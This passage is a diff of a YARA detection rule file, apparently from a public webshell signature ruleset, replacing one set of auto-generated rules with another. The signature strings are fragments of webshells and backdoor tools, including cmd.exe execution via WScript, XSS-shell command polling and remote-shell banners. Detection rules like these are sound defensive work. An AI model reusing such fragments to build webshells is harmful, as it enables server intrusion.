 		all of them
 }
-rule SIGNATURE_BASE_Unpack_Tback
+rule SIGNATURE_BASE_FSO_S_EFSO_2
 {
 	meta:
-		description = "Webshells Auto-generated - file TBack.dll"
+		description = "Webshells Auto-generated - file EFSO_2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5f93621-e1e9-5aed-b574-471b4c1f9570"
+		id = "e88d324c-1dee-5b07-b528-cf760e3ee7a6"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7357-L7368"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8384-L8396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a9d1007823bf96fb163ab38726b48464"
-		logic_hash = "0fb43766c305f4235cc0987f411fdc3b3674723687f0b63d346429f4a7b5b87f"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+		logic_hash = "462c713e5d4fb6d0db91b14bfacdca73f780559ba2dad80988c356ee1a3d369d"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "\\final\\new\\lcc\\public.dll"
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Darkspy105
+rule SIGNATURE_BASE_Thelast_Index3
 {
 	meta:
-		description = "Webshells Auto-generated - file DarkSpy105.exe"
+		description = "Webshells Auto-generated - file index3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9d519ccf-fe52-5b82-a39d-c9f86c1089e1"
+		id = "41310217-b9a7-5360-80c4-7d0a3969f848"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7369-L7380"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8397-L8408"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
-		logic_hash = "0f1c9dba4525f9c30f309500652ed6af647ddf492f483e101fc23c891e15fc85"
+		hash = "cceff6dc247aaa25512bad22120a14b4"
+		logic_hash = "3700141ca2cf53f49618e2d4cab8866efccdce843921f1733b3d6260b8feea68"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
+		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Editserver_EXE
+rule SIGNATURE_BASE_Adjustcr
 {
 	meta:
-		description = "Webshells Auto-generated - file EditServer.exe"
+		description = "Webshells Auto-generated - file adjustcr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97928144-0112-5288-8f95-acf7a0d56e71"
+		id = "4b3d9409-60e8-502a-b37b-1e06d57c9b0b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7381-L7394"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8409-L8423"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f945de25e0eba3bdaf1455b3a62b9832"
-		logic_hash = "d440669b0c0bf575cf9dea946edf55f724300a4c765e90c631fc1eee062bf006"
+		hash = "17037fa684ef4c90a25ec5674dac2eb6"
+		logic_hash = "d2a86083ff5cb34a0453f812e2d316c63342e529f00099a8869fa7e0a43321ef"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Server %s Have Been Configured"
-		$s5 = "The Server Password Exceeds 32 Characters"
-		$s8 = "9--Set Procecess Name To Inject DLL"
+		$s0 = "$Info: This file is packed with the UPX executable packer $"
+		$s2 = "$License: NRV for UPX is distributed under special license $"
+		$s6 = "AdjustCR Carr"
+		$s7 = "ION\\System\\FloatingPo"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Reader
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Xishell
 {
 	meta:
-		description = "Webshells Auto-generated - file reader.asp"
+		description = "Webshells Auto-generated - file xIShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d596f7f4-5b0d-5f17-94d3-2582ec041eb1"
+		id = "32a32a9a-8d5f-5b3f-8ff4-560555f0ae1e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7395-L7406"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8424-L8435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
-		logic_hash = "89a948f8da66173965884cd525615c8eeb91cf98a4984c05be7472034bb72f76"
+		hash = "997c8437c0621b4b753a546a53a88674"
+		logic_hash = "13393bc72477ab9a4ebc16b409de8ed73e086cc41f25f34315d11401b63c2471"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "mailto:mailbomb@hotmail."
+		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_ASP_Cmdasp
+rule SIGNATURE_BASE_Hytop_Apppack_2005
 {
 	meta:
-		description = "Webshells Auto-generated - file CmdAsp.asp"
+		description = "Webshells Auto-generated - file 2005.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4b48843-1936-5717-b2b6-add5b4a14d04"
+		id = "67c86d16-a962-5502-8c39-0a6e3dc04031"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7407-L7420"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8436-L8447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
-		logic_hash = "84c3148fe74b1afaa6e3bbff0aca8df1f1775759a36a673cc13d35ef7658929c"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+		logic_hash = "0de4800291132efca24b40bebcc895d6873110214c8cbf8384317208e0d9db82"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "' -- Read the output from our command and remove the temp file -- '"
-		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
-		$s9 = "' -- create the COM objects that we will be using -- '"
+		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_KA_Ushell
+rule SIGNATURE_BASE_Xssshell
 {
 	meta:
-		description = "Webshells Auto-generated - file KA_uShell.php"
+		description = "Webshells Auto-generated - file xssshell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "34e220db-2fb5-59dc-b5e8-d88f844d3977"
+		id = "ef89653c-5814-525a-b04e-4326a80f780c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7421-L7433"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8448-L8459"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "685f5d4f7f6751eaefc2695071569aab"
-		logic_hash = "58d25e19e2e14a909b4b623a85dfd8c62974121d3b23574d1e94b62385e42b45"
+		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
+		logic_hash = "6b0e602b523f58ec61850b4ba2e69da4fe4bf2833fb45e529785a398445db127"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
-		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
+		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_PHP_Backdoor_V1
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Usr
 {
 	meta:
-		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
+		description = "Webshells Auto-generated - file usr.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f47298a9-a47c-5088-ab1f-1bd76bfd0ca8"
+		id = "ab1825fe-96aa-5d97-acd6-eac43a12b237"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7434-L7447"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8460-L8471"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0506ba90759d11d78befd21cabf41f3d"
-		logic_hash = "396ae1ee34a06ab4863f4f54257a9020b8747fb99dff15372f0aa54fa4598e43"
+		hash = "ade3357520325af50c9098dc8a21a024"
+		logic_hash = "f5fd4a4c1b531b23b09505d302dc27d7ba2eb733fcf313c04ba9085b090f7cbe"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
-		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
+		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Svchostdll
+rule SIGNATURE_BASE_FSO_S_Phpinj
 {
 	meta:
-		description = "Webshells Auto-generated - file svchostdll.dll"
+		description = "Webshells Auto-generated - file phpinj.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b369d702-1f29-56ec-a742-f87d9c42c775"
+		id = "5d84d518-0e18-517f-890b-e296ac265c50"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7448-L7467"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8472-L8483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0f6756c8cb0b454c452055f189e4c3f4"
-		logic_hash = "4a7a7bb7d827c2e7801f8c33b292bb3d312428fc4ae79f07e103f456984c3b83"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+		logic_hash = "de4ac200f5426ec4c6fef21d5fbc37281811569a3e71a9bcb6fa51d13eb600a4"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "InstallService"
-		$s1 = "RundllInstallA"
-		$s2 = "UninstallService"
-		$s3 = "&G3 Users In RegistryD"
-		$s4 = "OL_SHUTDOWN;I"
-		$s5 = "SvcHostDLL.dll"
-		$s6 = "RundllUninstallA"
-		$s7 = "InternetOpenA"
-		$s8 = "Check Cloneomplete"
+		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Server
+rule SIGNATURE_BASE_Xssshell_Db
 {
 	meta:
-		description = "Webshells Auto-generated - file server.asp"
+		description = "Webshells Auto-generated - file db.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0e4fee1b-8a16-5738-9600-fa965f8c84c2"
+		id = "94bb2297-95a2-5442-bb16-fb079a29606e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7468-L7479"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8484-L8495"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d38526a215df13c7373da4635541b43"
-		logic_hash = "66b8513a532f64af535c948da28674795ae6495b9844165c3b039bf61c25eb46"
+		hash = "cb62e2ec40addd4b9930a9e270f5b318"
+		logic_hash = "3fdbaa17c12abef8576bf859065d90f4b6e80c187af734b71b26a1bd5d073e86"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<!-- PageServer Below -->"
+		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Vanquish
+rule SIGNATURE_BASE_PHP_Sh
 {
 	meta:
-		description = "Webshells Auto-generated - file vanquish.dll"
+		description = "Webshells Auto-generated - file sh.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "143e5e46-ffbc-5aee-9f9b-13374a6c3c10"
+		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7480-L7493"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8496-L8507"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "684450adde37a93e8bb362994efc898c"
-		logic_hash = "223c59d06a9389f380fa29959c54e53a17b53080f704189ae519b9527b2c6384"
+		hash = "1e9e879d49eb0634871e9b36f99fe528"
+		logic_hash = "da0b572f116cc5c55e8d7469f222896d602d09be4761a0e2139fc8ce67ac4050"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
-		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
-		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
+		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Winshell
+rule SIGNATURE_BASE_Xssshell_Default
 {
 	meta:
-		description = "Webshells Auto-generated - file winshell.exe"
+		description = "Webshells Auto-generated - file default.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24edd03a-df71-5d84-9764-ba7903b68064"
+		id = "1c221572-4cb5-5806-a856-0f857dba230a"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7494-L7513"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8508-L8519"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3144410a37dd4c29d004a814a294ea26"
-		logic_hash = "addbfa598039af09c0e4c50138fcfabd16c35c5516259cf9595cf49855da518d"
+		hash = "d156782ae5e0b3724de3227b42fcaf2f"
+		logic_hash = "6a8772a8a6399c3266abcc22a3c55eda70ec9703346398f5f1768bbd35974f8c"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
-		$s1 = "WinShell Service"
-		$s2 = "__GLOBAL_HEAP_SELECTED"
-		$s3 = "__MSVCRT_HEAP_SELECT"
-		$s4 = "Provide Windows CmdShell Service"
-		$s5 = "URLDownloadToFileA"
-		$s6 = "RegisterServiceProcess"
-		$s7 = "GetModuleBaseNameA"
-		$s8 = "WinShell v5.0 (C)2002 janker.org"
+		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Remview
+rule SIGNATURE_BASE_Editserver_2
 {
 	meta:
-		description = "Webshells Auto-generated - file remview.php"
+		description = "Webshells Auto-generated - file EditServer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5040ddbc-2e61-50ca-b738-a4ac8feec3f1"
+		id = "bd254bd9-fd23-5807-9347-2a559089b7c5"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7514-L7527"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8520-L8533"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b4a09911a5b23e00b55abe546ded691c"
-		logic_hash = "19719e8c9215ec9ba9fab55b604907e0a6d0a0507a5662926acff1e9dc03440e"
+		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
+		logic_hash = "c581936928ce0f1061feb5665c743f14f12a9f875e360f40cc064f3047b23adf"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
-		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
-		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
+		$s0 = "@HOTMAIL.COM"
+		$s1 = "Press Any Ke"
+		$s3 = "glish MenuZ"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Saphpshell
+rule SIGNATURE_BASE_By064Cli
 {
 	meta:
-		description = "Webshells Auto-generated - file saphpshell.php"
+		description = "Webshells Auto-generated - file by064cli.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "42bcd739-714e-5dbf-a3a1-929f3d16ed6f"
+		id = "9ea88f0c-9275-5567-a4d9-0545de8044d1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7528-L7539"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8534-L8546"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d7bba8def713512ddda14baf9cd6889a"
-		logic_hash = "24d558292a709bb29334b1acdc53cdb6c5bc6803caec527edcacd6a19f6dc7c9"
+		hash = "10e0dff366968b770ae929505d2a9885"
+		logic_hash = "51efd5c510efc6657ae175af47b09437ae70eb0237d88ffdf3cdae365d0ec7be"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
+		$s7 = "packet dropped,redirecting"
+		$s9 = "input the password(the default one is 'by')"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006Z
+rule SIGNATURE_BASE_Mithril_Dlltest
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006Z.exe"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		id = "59a6bfb6-c099-56cd-b40e-3e92ea0eb7d3"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7540-L7552"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8547-L8559"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fd1b6129abd4ab177fed135e3b665488"
-		logic_hash = "4b427132541cd26ee47c387a98f6f46f86808f9a775068e1d114c9ef4abca9f6"
-		score = 75
+		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
+		logic_hash = "c8c8d1b75ed4eb4bc66a762e53aa6b3ab439e96ef464a8b9ffa4dff887986465"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
-		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
+		$s0 = "please enter the password:"
+		$s3 = "\\dllTest.pdb"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Admin_Ad
+rule SIGNATURE_BASE_Peek_A_Boo
 {
 	meta:
-		description = "Webshells Auto-generated - file admin-ad.asp"
+		description = "Webshells Auto-generated - file peek-a-boo.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d87b4f6-3227-53cb-803c-4f9c7327f203"
+		id = "f6ca33b5-e37f-5124-a193-a3056c559314"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7553-L7565"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8560-L8576"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
-		logic_hash = "0febd10979a959af73332a8e064a510e949109abf863b5fd0fef19b635968d1d"
+		hash = "aca339f60d41fdcba83773be5d646776"
+		logic_hash = "b103c1b873dd0df9626d72a1127fbadc821777a05012a080423263a2083c398b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
-		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
+		$s0 = "__vbaHresultCheckObj"
+		$s1 = "\\VB\\VB5.OLB"
+		$s2 = "capGetDriverDescriptionA"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s8 = "__vbaErrorOverflow"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Casus15
+rule SIGNATURE_BASE_Fmlibraryv3
 {
 	meta:
-		description = "Webshells Auto-generated - file casus15.php"
+		description = "Webshells Auto-generated - file fmlibraryv3.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "305842e4-26ad-573d-8df3-e32e239e434b"
+		id = "9b8ef79d-80bb-5a05-91e6-0f2bc3fd3068"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7566-L7577"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8577-L8588"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8d155b4239d922367af5d0a1b89533a3"
-		logic_hash = "58921290952f23ff5b828d8c92c818ebd91b726cdbbc9137b0f55a0e5ca90636"
+		hash = "c34c248fed6d5a20d8203924a2088acc"
+		logic_hash = "a7dc83db26cdda757f626c42022c17bb2764074a3cc5f87b4a3aaa991fac5dc2"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
+		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_BIN_Client
+rule SIGNATURE_BASE_Debug_Dlltest_2
 {
 	meta:
-		description = "Webshells Auto-generated - file Client.exe"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "515ab1b3-7923-55de-8c19-71ef5d9b4366"
+		id = "cf81e3de-513c-584d-bc37-6504e91b170c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7578-L7594"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8589-L8601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
-		logic_hash = "e1277f6b7adc2e832a3aad96c7e44796596d2e61eb9247977da3c3569777e0b2"
-		score = 75
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+		logic_hash = "bf260ce0f8d4728920679573cd77927b44db28ba6102923707af8d1ad7d0ef2d"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "=====Remote Shell Closed====="
-		$s2 = "All Files(*.*)|*.*||"
-		$s6 = "WSAStartup Error!"
-		$s7 = "SHGetFileInfoA"
-		$s8 = "CreateThread False!"
-		$s9 = "Port Number Error"
+		$s4 = "\\Debug\\dllTest.pdb"
+		$s5 = "--list the services in the computer"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Uptime
+rule SIGNATURE_BASE_Connector
 {
